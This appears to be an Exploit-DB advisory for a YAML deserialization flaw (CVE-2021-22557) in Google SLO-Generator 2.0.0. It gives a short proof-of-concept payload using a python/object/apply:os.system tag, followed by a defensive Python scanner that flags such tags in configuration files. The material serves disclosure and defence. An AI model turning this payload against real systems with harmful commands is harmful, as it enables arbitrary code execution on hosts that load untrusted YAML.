Google SLO-Generator 2.0.0 – Code Execution

  • Author: Kiran Ghimire
    Date: 2021-10-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50385/
  • # Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
    # Date: 2021-09-28
    # Exploit Author: Kiran Ghimire
    # Software Link: https://github.com/google/slo-generator/releases
    # Version: <= 2.0.0
    # Tested on: Linux
    # CVE: CVE-2021-22557
    
    ##############################################################################
    
    *Introduction*:
    SLO-Generator is a tool to compute and export Service Level Objectives
    (SLOs), Error Budgets and Burn Rates, using configurations written in YAML
    (or JSON) format.
    
    ##############################################################################
    
    *POC:*
    1. pip3 install slo-generator==2.0.0
    2. Save the YAML below in a file named exploit.yaml:
     !!python/object/apply:os.system ["id;whoami"]
    3. Run the command below:
     slo-generator migrate -b exploit.yaml
    ##############################################################################
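
A defensive pre-flight check for configuration files like the one in step 2, added here as an example (it is not part of the original advisory or of slo-generator): it reports every tag that resolves to PyYAML's `python/` namespace, which is the kind of tag the PoC file relies on. The name `find_python_tags` and the sample documents are constructed for illustration; the check goes slightly beyond the PoC by also resolving verbatim tags, `%TAG` handles and %-escapes, shown here with the harmless `python/tuple` tag.

```python
import re
from urllib.parse import unquote

# Namespace PyYAML uses for tags that construct arbitrary Python objects.
PY_PREFIX = "tag:yaml.org,2002:python/"
TAG_DIRECTIVE = re.compile(r"^%TAG\s+(!(?:[\w-]*!)?)\s+(\S+)")
# A tag token: verbatim !<uri>, or a handle (!, !!, !name!) plus a suffix.
TAG_TOKEN = re.compile(r"!<([^>\s]+)>|(!(?:[\w-]*!)?)([^\s\[\]{},]*)")


def find_python_tags(text):
    """Return [(line_no, resolved_tag)] for tags in PyYAML's python/ namespace.

    Deliberately conservative: comments and quoted strings are scanned too,
    and %TAG handles persist across documents, so the check may over-report.
    This is a text scan, not a YAML parser.
    """
    handles = {"!": "!", "!!": "tag:yaml.org,2002:"}  # YAML default handles
    hits = []
    for line_no, line in enumerate(text.lstrip("\ufeff").splitlines(), 1):
        directive = TAG_DIRECTIVE.match(line)
        if directive:  # remember the prefix a custom handle expands to
            handles[directive.group(1)] = directive.group(2)
            continue
        for verbatim, handle, suffix in TAG_TOKEN.findall(line):
            # Expand the handle, then decode %-escapes before comparing.
            resolved = unquote(verbatim or handles.get(handle, handle) + suffix)
            if resolved.startswith(PY_PREFIX):
                hits.append((line_no, resolved))
    return hits


# Constructed sample documents; "poc" is the line from step 2 of the advisory.
SAMPLES = {
    "poc": '!!python/object/apply:os.system ["id;whoami"]\n',
    "verbatim": "value: !<tag:yaml.org,2002:python/tuple> [1, 2]\n",
    "handle": "%TAG !p! tag:yaml.org,2002:python/\n---\nvalue: !p!tuple [1, 2]\n",
    "escaped": "value: !!pytho%6E/tuple [1, 2]\n",
    "benign": 'slo_name: availability\ngoal: !!float 0.99\nnote: "Ship it!"\n',
}

if __name__ == "__main__":
    for name, doc in SAMPLES.items():
        print(name, find_python_tags(doc))
```

PyYAML's `yaml.safe_load` refuses `python/` tags outright, so a scan like this is only a gate for files from untrusted sources before they reach a tool that may load them unsafely.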